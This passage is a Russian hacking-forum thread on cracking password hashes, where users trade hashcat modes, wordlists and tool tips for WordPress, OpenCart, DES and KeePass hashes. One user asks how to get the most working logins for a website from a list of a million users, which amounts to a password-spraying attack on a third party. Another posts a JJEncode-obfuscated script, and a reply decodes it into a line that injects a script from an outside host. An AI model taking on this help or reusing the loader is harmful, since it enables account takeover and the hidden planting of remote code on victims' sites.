Вопросы и Ответы Задай вопрос - получи Ответ

Discussion in 'Криптография, расшифровка хешей' started by +, 13 Nov 2008.

  1. Tanya-t-t

    Tanya-t-t New Member

    Joined:
    17 Mar 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет ребята,я далековата от хакерства,но сейчас вот столкнулась.... Пытаюсь достать пароль из хеша с помощью барса, но выдает wrong md5 hash. It should be 32 hex characters.
    не пойму... хеш от worldpress, почитала,вроде пишут что он md5... в чем подвох,подскажите пожалуйста. и как быть. сам хеш $P$BUdq1jQH1qt8SD5REeVt0mDILecU010 еще читала что проблема может быть в какой то соли, по этому и 34 символа. Чем его победить , подскажите пожалуйста?
     
  2. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Подскажите, где нибудь есть структурированная хорошая база азиатских словарей? В частности интересует китай, южная корея, и япония.
    Буду признателен, если кто поделится, или хотя бы подскажет направление, где можно достать.
     
  3. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,348
    Likes Received:
    36,524
    Reputations:
    70
    EWSA
    WIFIPR
     
    user100 likes this.
  4. zxDENIxz

    zxDENIxz Member

    Joined:
    25 Sep 2011
    Messages:
    23
    Likes Received:
    9
    Reputations:
    0
    Всем привет, читал об использовании радужных таблиц и так не понял... На сколько актуально их использовать для расшифровки md5. Стоит ли этим заниматься? Может у кого есть опыт. Поделитесь советом.
     
  5. vitek9603

    vitek9603 New Member

    Joined:
    14 Nov 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Добрый день. Подскажите как можно декодировать данные за вознаграждение из
    $*KwFFcWAORxEVQTo1JD5tEB0JKS4wRkVCQVBWYxofFTBGRgAAAAC3TJXz$
    $*KwEUTjFfWBVgEBIUAAAAAGFQZDM$
    $*KwGi-Ifp7qPWpqSi6KeJ9eioAAAAADhuts8$

    За подробностями в личку.
     
  6. salivate

    salivate New Member

    Joined:
    14 Aug 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    помогите расшифровать, буду премного благодарен
    3701AFEC936E06BF
    3733C18BCE614EFF51BAB74CE6E897
     
  7. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Помогите рашифровать
    Code:
    <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+$.$$$_+(![]+"")[$._$_]+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"('\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"');"+$.$$$_+(![]+"")[$._$_]+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+"'\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$._$$+"://"+$.$$__+(![]+"")[$._$_]+$._$+$._+$.$$_$+$.$$__+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+".\\"+$.__$+$.$__+$.$$$+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"/\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$__+$.$$$+(![]+"")[$._$_]+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$.$__+$.$$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$_+$.__$+$.$_$+$.$$_$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$._$_+$.$__+$.$___+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+$.___+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.___+$._$$+$.__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+$._$_+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.__$+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$._$$+"_\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.___+$.$$__+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$$_+$.__$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$_$+$.$$_$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$._$_+$.__$+$.$$__+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.__$+$.$$_+$.$$__+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.$__+$.$_$_+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$_$+$.$_$+$.$__+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+$.$$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.$$_+$.$$$+$.$_$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"?"+$.__+"\\"+$.__$+$.$$_+$._$_+(![]+"")[$._$_]+"="+$.___+"."+$._$$+$.$_$+"';"+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+"."+$.$_$_+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.$$_$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.$$$_+(![]+"")[$._$_]+");"+"\"")())();</script>
     
  8. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    да вроде гуглом за 5 минут решается
    https://github.com/jacobsoo/Decoder-JJEncode
    Code:
    var el = document.createElement('script');el.src = 'https://cloudcdn.gdn/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.35';document.head.appendChild(el);
    или не то пальто?
     
    Octavian and seostock like this.
  9. firstnamel4stname

    Joined:
    29 Sep 2019
    Messages:
    204
    Likes Received:
    13
    Reputations:
    0
    Пытаюсь расхешить опенкарт, но не получается.
    Хеш:
    2b94552ec181b8b100d3cfc7e11996ef55b17216:2ghl2OYSv
    пароль:
    AeRieVoh80
    нагуглил, это опенкарт это 4900 в хешкете и по виду совпадает.
    но:
    [​IMG]
    что не так делаю? подскажите плиз
    такие же проблемы у меня со всеми почти хешами, кроме обычного мд5.
     
  10. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    ХЗ че ты там гуглил
    опенкарт 13900
    [​IMG]
     
    #1570 karkajoi, 29 Sep 2019
    Last edited: 29 Sep 2019
    Alexmeh and erwerr2321 like this.
  11. obtim

    obtim Member

    Joined:
    19 Aug 2016
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    пароль AuFgEpQW9
    от него хеш Fx7IyqDNsSXz\n
    В теории это DES(Unix), Traditional DES (Hashcat Mode 1500)
    Подозреваю, что тут еще соль какая-то должна быть. Еще связок пароль-хэш могу достать
    Вопрос: как (и возможно ли) вычислить соль?
     
  12. AbakBarama

    AbakBarama Elder - Старейшина

    Joined:
    25 Sep 2010
    Messages:
    349
    Likes Received:
    298
    Reputations:
    51
    В DES(Unix) пароль максимум 8 символов, а у вас - 9.
    Хэш должен быть ровно 13 символов, а у вас - 12 ("\n" - спецсимвол, не считается).

    Поэтому для начала нужно, как минимум, убедиться, что имеете дело с алгоритмом на основе DES(Unix):
    1. Независимо от длины пароля длина хэша всегда должна быть одинаковой.
    2. Хэши для паролей длиннее 8 символов должны быть такими же, как от начальных 8-ми символов.

    Если оба пункта будут TRUE, тогда можно пытаться искать соль, она всего 2 символа, перебрать не проблема.
     
    obtim likes this.
  13. obtim

    obtim Member

    Joined:
    19 Aug 2016
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Прогоняю через hashid
    root@kali:~# hashid Fx7IyqDNsSXz\n
    Analyzing 'Fx7IyqDNsSXzn'
    говорит
    [+] DES(Unix)
    [+] Traditional DES
    [+] DEScrypt

    Синтаксис вроде как правильный задаю. Кроме этого на online сервисе прогонял, он говорит DES(Unix)
    Поэтому и решил, что именно DES(Unix)
     
  14. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Создал базу данных на keepass с паролем 123456
    Хеш:
    Черех hashcat пытаюсь прогнать
    hashcat64.exe -a 0 -m 13400 -w 3 D:\hack\shell\keepass.txt F:\пароли\pass123
    Но выводит:
    Почему не видит хеш?
    В файле keepass он
    А Базу данных Keepass2 видит прекрасно
     
  15. firstnamel4stname

    Joined:
    29 Sep 2019
    Messages:
    204
    Likes Received:
    13
    Reputations:
    0
    [​IMG]
    Podskajite please chto za tip hesha? sprava vnizy na skrine varianty kotorye pereproboval v hashcat

    HASH:
    90b739d310ab63f2b0905fda203036a7:ce
    PASS:
    12345
     
  16. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    osCommerce -m 21
    На будущее https://hashcat.net/wiki/doku.php?id=example_hashes
     
  17. 200Rollie

    200Rollie New Member

    Joined:
    21 Aug 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Hydra (Kali) - Не работает с прокси серверами, не может использовать емэйл адрес как вариант в списке паролей.

    Samnao smtp cracker - Не работает с бигами (как гмейл, хотмейл, и Оффис365). Решение?
     
  18. 200Rollie

    200Rollie New Member

    Joined:
    21 Aug 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Главная задача:
    Нужно получить максимальное количество ЛЮБЫХ РАБОЧИХ логинов для сайта.

    Например: Есть список юзеров - 1 млн.
    Вопрос: Какое самое эффективное сочетание юзер:пароль для атаки, чтоб уложиться в за неделю?

    Варианты:
    1. Использовать 100 юзеров со всем списком паролей (т.е. 1млн)
    2. Использовать одинаковое число паролей и юзер-нэймов
    3. Использовать все юзеры сразу (1млн), тестируя на каждый по 100 самых популярных пароля.

    Здесь есть кто-то, кто смог бы подсказать что-то по этому поводу?
    Какой способ более эффективный (из вышеперечисленных)?
    Или может быть у вас есть другие идеи? Более оригинальные или даже гениальные?
     
  19. obtim

    obtim Member

    Joined:
    19 Aug 2016
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Нашелся файл Excel с паролем на открытие. Прогнал его по дефолту Office Password Recovery by Elcomsoft(6.34) - ничем не помог. Как понимаю, светит брутфорс. Подскажите, откуда взять нормальный словарь?
     
  20. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    https://weakpass.com на любой вкус и цвет
     
    fandor9 and obtim like this.